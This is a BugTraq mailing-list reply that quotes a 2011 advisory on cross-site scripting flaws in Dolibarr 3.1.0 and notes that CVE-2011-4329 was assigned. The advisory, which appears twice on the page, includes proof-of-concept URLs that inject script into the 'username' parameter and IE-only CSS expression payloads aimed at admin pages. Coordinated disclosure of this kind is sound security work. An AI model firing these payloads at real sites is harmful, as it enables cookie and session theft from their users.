BugTraq
Back to list
|
Post reply
Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Nov 09 2011 09:59AM
security infoserve de
(1 replies)
Re: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Nov 21 2011 04:32PM
Henri Salo (henri nerv fi)
On Wed, Nov 09, 2011 at 09:59:18AM +0000, security (at) infoserve (dot) de [email concealed] wrote:
> Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
> Advisory ID: INFOSERVE-ADV2011-03
> Author: Stefan Schurtz
> Contact: security (at) infoserve (dot) de [email concealed]
> Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected
> Vendor URL: http://www.dolibarr.org/
> Vendor Status: fixed in the 3.1 branch
>
> ==========================
> Vulnerability Description
> ==========================
>
> Dolibarr 3.1.0 is prone to multiple XSS vulnerability
>
> ==================
> PoC-Exploit
> ==================
>
> Cross-Site-Scripting - parameter 'username'
>
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>&=3&optioncss=print
>
> IE-only
>
> http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))
>
> =========
> Solution:
> =========
>
> Fixed in the 3.1 branch
>
> ====================
> Disclosure Timeline:
> ====================
>
> 08-Nov-2011 - vendor informed
> 09-Nov-2011 - vendor fix in the 3.1 branch
>
> ========
> Credits:
> ========
>
> Vulnerabilities found and advisory written by INFOSERVE Security Team
>
> ===========
> References:
> ===========
>
> https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
> https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e35
44a4207e78a1
> http://www.dolibarr.org/
> http://www.infoserve.de/
CVE-2011-4329 is assigned for this issue.
Best regards,
Henri Salo
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
> Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
> Advisory ID: INFOSERVE-ADV2011-03
> Author: Stefan Schurtz
> Contact: security (at) infoserve (dot) de [email concealed]
> Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected
> Vendor URL: http://www.dolibarr.org/
> Vendor Status: fixed in the 3.1 branch
>
> ==========================
> Vulnerability Description
> ==========================
>
> Dolibarr 3.1.0 is prone to multiple XSS vulnerability
>
> ==================
> PoC-Exploit
> ==================
>
> Cross-Site-Scripting - parameter 'username'
>
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>
> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username=
'"</script><script>alert(document.cookie)</script>&=3&optioncss=print
>
> IE-only
>
> http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
> http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))
>
> =========
> Solution:
> =========
>
> Fixed in the 3.1 branch
>
> ====================
> Disclosure Timeline:
> ====================
>
> 08-Nov-2011 - vendor informed
> 09-Nov-2011 - vendor fix in the 3.1 branch
>
> ========
> Credits:
> ========
>
> Vulnerabilities found and advisory written by INFOSERVE Security Team
>
> ===========
> References:
> ===========
>
> https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
> https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e35
44a4207e78a1
> http://www.dolibarr.org/
> http://www.infoserve.de/
CVE-2011-4329 is assigned for this issue.
Best regards,
Henri Salo
[ reply ]